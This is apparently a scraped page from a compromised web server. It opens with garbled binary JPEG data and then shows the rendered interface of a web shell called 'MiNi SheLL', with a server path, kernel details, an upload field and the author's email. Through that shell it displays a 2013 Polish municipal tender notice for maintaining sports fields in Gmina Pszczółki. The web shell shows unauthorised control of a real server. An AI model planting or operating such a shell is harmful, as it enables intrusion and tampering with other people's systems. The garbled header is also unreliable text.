JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130306/34847-N-2013.html

<p class="kh_header"><b>Pszczółki: Utrzymanie terenów rekreacyjno - sportowych w gminie Pszczółki</b><br>
<b>Numer ogłoszenia: 34847 - 2013; data zamieszczenia: 06.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pszczółki , ul. Pomorska 18, 83-032 Pszczółki, woj. pomorskie, tel. 058 6839128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pszczolki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie terenów rekreacyjno - sportowych w gminie Pszczółki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje następujące usługi: 
1. CZĘŚĆ I
Utrzymanie nawierzchni trawiastych na następujących obiektach:
1.1. Stadion w Pszczółkach nawierzchnia  z trawy naturalnej o  powierzchni ok. 10.000 m2, w tym pole gry ok. 6.000 m2 (nawierzchnia wyposażona w automatyczny system deszczujący), w zakresie: 
a. wertykulacji - 1 raz w sezonie,
b. oprysków ochronnych - 2 razy w sezonie,
c. nawożenia murawy w dawce minimalnej  20g/m2 - min. 12 razy w sezonie,
d. dosiewu wgłębnego odpowiednio dobraną mieszanką traw - min. 1 raz w sezonie,
e. koszenia  murawy na wysokość ca 3-4 cm, a w okresie letniej przerwy w rozgrywkach 1,5 cm wyżej  - min. 1 raz w tygodniu, w przypadku stosowania kosiarki wrzecionowej co 5 koszenie należy wykonać kosiarką rotacyjną;
f. uzupełniania uszkodzonej darni w polu bramkowym i w miejscach gdzie wystąpiło jej znaczne uszkodzenie ( np. pole karne) - 1 raz po zakończeniu każdej rundy rozgrywek,    
g. wywozu i utylizacji odpadów biologicznych powstałych podczas wykonywania zamówienia i bieżącej obsługi systemu deszczowania; 
h. wykonania trzech  analiz glebowych w terminach do 30 marca, 10 czerwca,  15 września w zakresie zawartości składników pokarmowych tj.  P2O5, K2O, Mg wraz z zaleceniem nawozowym oraz ph gleby.
1.2. Boisko piłkarskie w Różynach, nawierzchnia  z trawy naturalnej o powierzchni ok. 7.600 m2, w tym pole gry ok. 6.000 m2 (nawierzchnia wyposażona w automatyczny system deszczowania), w zakresie: 
a. wertykulacji - 1 raz w sezonie,
b. aeracji - 1 razy w sezonie,
c. oprysków ochronnych - 1 raz w sezonie,
d. nawożenia murawy w dawce minimalnej  20g/m2 - 12  razy w sezonie,
e. koszenia  murawy na wysokość ca 3-4 cm, a w okresie letniej przerwy w rozgrywkach 1,5 cm wyżej - 1 raz w tygodniu, w przypadku stosowania kosiarki wrzecionowej  co 5 koszenie należy wykonać kosiarką rotacyjną;
f. wywozu i utylizacji odpadów biologicznych powstałych podczas wykonywania zamówienia;  
g. wykonania trzech  analiz glebowych w terminach do 30 marca, 10 czerwca,  15 września w zakresie  zawartości składników pokarmowych tj.  P2O5, K2O, Mg wraz z zaleceniem nawozowym oraz ph gleby.
1.3. Koszenie terenu parku Lipowego w Pszczółkach o pow. 20.000 m2 - 4 razy w ciągu roku  po wcześniejszym uzgodnieniu terminu z Zamawiającym. 
2. CZĘŚĆ II
Pielęgnacja nawierzchni syntetycznych w gminie Pszczółki, w tym:
2.1. Nawierzchnie z trawy syntetycznej na boiskach położonych w miejscowościach: Pszczółki (stadion sportowy) o powierzchni 1.560 m2 oraz w miejscowości Różyny o powierzchni 1.860 m2 poprzez wykonanie rocznie dwóch zabiegów polegających na:
- usunięciu luźnych zanieczyszczeń z powierzchni takich jak kamienie, kawałki szkła, liście, itp.,
- rozluźnieniu górnej warstwy wypełnienia,
- oczyszczeniu wypełnienia poprzez oddzielenie granulatu od wszelkich drobnych zanieczyszczeń,
- równomierne rozprowadzenie granulatu na całej powierzchni,
- końcowe czesanie odświeżające włókna trawy.
2.2.Nawierzchnia poliuretanowa o powierzchni ok. 600 m2 w miejscowości Różyny, w zakresie wykonania 2 zabiegów, polegających na czyszczeniu zamiatarką i myjką wysokociśnieniową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9, 77.31.41.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala dla części I wadium w wysokości  1.500,00 zł, dla części II w wysokości 200,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej dwóch zadań w zakresie utrzymania i pielęgnacji nawierzchni z trawy naturalnej boisk sportowych lub pól golfowych, o wartości nie mniejszej niż 30.000 zł netto każde.
Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - dysponowanie potencjałem technicznym w postaci, następującego sprzętu: co najmniej jednej kosiarki rotacyjnej lub wrzecionowej, wykaszarki, urządzenia do aeracji, urządzenia do wertykulacji, siewnika do trawy, zamiatarki do trawy, opryskiwacza ciągnikowego, ciągnika z ogumieniem specjalnym na tereny zielone.
Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - dysponowanie pracownikami posiadającymi co najmniej 2 letnie doświadczenie zawodowe w zakresie wykonywania prac utrzymania i pielęgnacji nawierzchni z trawy naturalnej boisk sportowych lub pól golfowych - co najmniej 2 osoby.
Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I i II - posiadanie ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na wartość co najmniej 50.000,00 zł dla każdej części osobno, w przypadku złożenia ofert na obie części wartość ubezpieczenia wyniesie co najmniej 100.000 zł.
Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 oraz warunków określonych w Specyfikacji Istotnych Warunków Zamówienia przez Zamawiającego (znajdujące się 
w Druku Oferta - pkt 2);
2. wykaz wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, o którym mowa w pkt 5.1.1. SIWZ wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie - o treści odpowiadającej załącznikowi nr 2 do SIWZ;
2.1. Dowodami o których mowa w pkt. 2. są poświadczenia lub oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.
2.2. Zamiast dowodów o których mowa w pkt. 2.1 Wykonawca może przedłożyć dokumenty potwierdzające należyte wykonanie usług zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009r. Nr 226, poz. 1817).
2.3. W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w pkt. 2, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów opisanych w pkt. 2.1. oraz 2.2.
2.4. W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa odpowiednio w pkt. 2.1 oraz pkt. 2.2, budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.
3. oświadczenie o dysponowaniu potencjałem technicznym w postaci, następującego sprzętu: co najmniej jednej kosiarki rotacyjnej lub wrzecionowej, wykaszarki, urządzenia do aeracji, urządzenia do wertykulacji, siewnika do trawy, zamiatarki do trawy, opryskiwacza ciągnikowego, ciągnika z ogumieniem specjalnym na tereny zielone lub pisemne zabezpieczenie innych podmiotów do udostępnienia potencjału technicznego (znajdujące się w druku Oferta - pkt 10) - dot. Części I; 
4. oświadczenie o posiadaniu pracowników z co najmniej 2 letnim doświadczeniem zawodowym w zakresie wykonywania prac utrzymania i pielęgnacji nawierzchni  z trawy naturalnej boisk sportowych lub pól golfowych, co najmniej 2 osoby (znajdujące się w druku Oferta - pkt 9) - dot. Części I; 
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, mają zastosowanie postanowienia § 4.1. Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231).
6. Wykonawca wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust 2 pkt. 5 ustawy Pzp, albo informację o tym, że nie należy do grupy kapitałowej, na podstawie art. 26 ust. 2d ustawy Pzp.
7. Wykluczeniu z postępowania będą podlegali Wykonawcy, którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2007 r., Nr 50, poz. 331 z późn. zm.), złożyli odrębne oferty w tym samym postępowaniu, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy wykonawcami w postępowaniu o udzielenie zamówienia.
8. Wypełniony druk oferty - o treści odpowiadającej drukowi Oferty stanowiącej część II SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.pszczolki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Pszczółkach
83-032 Pszczółki, ul. Pomorska 18
pokój nr 1 - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2013 godzina 09:30, miejsce: Urząd Gminy w Pszczółkach
83-032 Pszczółki, ul. Pomorska 18
pokój nr 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie nawierzchni trawiastych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I
Utrzymanie nawierzchni trawiastych na następujących obiektach:
1. Stadion w Pszczółkach nawierzchnia  z trawy naturalnej o  powierzchni ok. 10.000 m2, w tym pole gry ok. 6.000 m2 (nawierzchnia wyposażona w automatyczny system deszczujący), w zakresie: 
a. wertykulacji - 1 raz w sezonie,
b. oprysków ochronnych - 2 razy w sezonie,
c. nawożenia murawy w dawce minimalnej  20g/m2 - min. 12 razy w sezonie,
d. dosiewu wgłębnego odpowiednio dobraną mieszanką traw - min. 1 raz w sezonie,
e. koszenia  murawy na wysokość ca 3-4 cm, a w okresie letniej przerwy w rozgrywkach 1,5 cm wyżej  - min. 1 raz w tygodniu, w przypadku stosowania kosiarki wrzecionowej co 5 koszenie należy wykonać kosiarką rotacyjną;
f. uzupełniania uszkodzonej darni w polu bramkowym i w miejscach gdzie wystąpiło jej znaczne uszkodzenie ( np. pole karne) - 1 raz po zakończeniu każdej rundy rozgrywek,    
g. wywozu i utylizacji odpadów biologicznych powstałych podczas wykonywania zamówienia i bieżącej obsługi systemu deszczowania; 
h. wykonania trzech  analiz glebowych w terminach do 30 marca, 10 czerwca,  15 września w zakresie zawartości składników pokarmowych tj.  P2O5, K2O, Mg wraz z zaleceniem nawozowym oraz ph gleby.
2. Boisko piłkarskie w Różynach, nawierzchnia  z trawy naturalnej o powierzchni ok. 7.600 m2, w tym pole gry ok. 6.000 m2 (nawierzchnia wyposażona w automatyczny system deszczowania), w zakresie: 
a. wertykulacji - 1 raz w sezonie,
b. aeracji - 1 razy w sezonie,
c. oprysków ochronnych - 1 raz w sezonie,
d. nawożenia murawy w dawce minimalnej  20g/m2 - 12  razy w sezonie,
e. koszenia  murawy na wysokość ca 3-4 cm, a w okresie letniej przerwy w rozgrywkach 1,5 cm wyżej - 1 raz w tygodniu, w przypadku stosowania kosiarki wrzecionowej  co 5 koszenie należy wykonać kosiarką rotacyjną;
f. wywozu i utylizacji odpadów biologicznych powstałych podczas wykonywania zamówienia;  
g. wykonania trzech  analiz glebowych w terminach do 30 marca, 10 czerwca,  15 września    w zakresie  zawartości składników pokarmowych tj.  P2O5, K2O, Mg wraz z zaleceniem nawozowym oraz ph gleby.
3. Koszenie terenu parku Lipowego w Pszczółkach o pow. 20.000 m2 - 4 razy w ciągu roku  po wcześniejszym uzgodnieniu terminu z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pielęgnacja nawierzchni syntetycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II
Pielęgnacja nawierzchni syntetycznych w gminie Pszczółki, w tym:
1. Nawierzchnie z trawy syntetycznej na boiskach położonych w miejscowościach: Pszczółki (stadion sportowy) o powierzchni 1.560 m2 oraz w miejscowości Różyny o powierzchni 1.860 m2 poprzez wykonanie rocznie dwóch zabiegów polegających na:
- usunięciu luźnych zanieczyszczeń z powierzchni takich jak kamienie, kawałki szkła, liście, itp.,
- rozluźnieniu górnej warstwy wypełnienia,
- oczyszczeniu wypełnienia poprzez oddzielenie granulatu od wszelkich drobnych zanieczyszczeń,
- równomierne rozprowadzenie granulatu na całej powierzchni,
- końcowe czesanie odświeżające włókna trawy.
2.Nawierzchnia poliuretanowa o powierzchni ok. 600 m2 w miejscowości Różyny, w zakresie wykonania 2 zabiegów, polegających na czyszczeniu zamiatarką i myjką wysokociśnieniową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com